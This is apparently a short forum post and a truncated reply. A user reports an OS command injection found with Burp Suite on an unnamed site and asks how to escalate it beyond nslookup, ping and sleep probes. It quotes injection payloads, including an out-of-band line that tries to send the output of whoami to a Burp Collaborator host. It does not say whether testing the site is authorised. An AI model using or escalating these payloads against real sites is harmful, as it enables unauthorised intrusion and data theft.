A few days ago I found a vulnerability in a site of interest through the Burp Suite scanner, using the nslookup xxx.burpcolaborator.com exploit, with the following feature:
Issue: OS command injection
Severity: High
Confidence: Certain
The vulnerability only responds when using ` and only responds to nslookup, sleep and ping, including the Burp Collaborator.
These are the only commands it responds to:
nslookup xxx.burpcolaborator.com
ping xxx.burpcolaborator.com
sleep 10
Other commands, like nslookup $(whoami).xxx.burpcollaborator.com, do not give any answer. Please, I would appreciate it if you could help me with this problem, since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep.
I await your response. Thanks
Seems like it could be Windows, which is why $() wouldn't work. Maybe try: